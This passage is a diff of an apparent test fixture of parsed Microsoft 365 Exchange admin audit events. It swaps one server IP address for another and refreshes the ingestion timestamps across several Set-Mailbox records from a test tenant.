[ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -1776,8 +1776,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177626500Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853075900Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -1797,12 +1797,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1845,7 +1845,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -1857,8 +1857,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177629300Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:56\",\"ExternalAccess\":true,\"Id\":\"d83e97f0-951c-4ccc-630e-08d7ac0f267e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853081600Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:56\",\"ExternalAccess\":true,\"Id\":\"d83e97f0-951c-4ccc-630e-08d7ac0f267e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -1878,12 +1878,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1926,7 +1926,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -1938,8 +1938,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177632400Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2cbbd2bb-607e-49b1-c02c-08d7adfc0e1c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853087900Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2cbbd2bb-607e-49b1-c02c-08d7adfc0e1c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -1959,12 +1959,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2007,7 +2007,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -2019,8 +2019,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177635100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"165a283d-6f9b-4dc2-1b86-08d7ac0f273c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853093900Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"165a283d-6f9b-4dc2-1b86-08d7ac0f273c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -2040,12 +2040,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2088,7 +2088,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -2100,8 +2100,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177637800Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:16\",\"ExternalAccess\":true,\"Id\":\"979931d3-c99d-45b1-14e1-08d7ac0f3209\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853099700Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:16\",\"ExternalAccess\":true,\"Id\":\"979931d3-c99d-45b1-14e1-08d7ac0f3209\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -2121,12 +2121,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2169,7 +2169,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -2181,8 +2181,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177641200Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"4bddac31-664e-4432-d181-08d7ac0f34d2\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853105500Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"4bddac31-664e-4432-d181-08d7ac0f34d2\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted 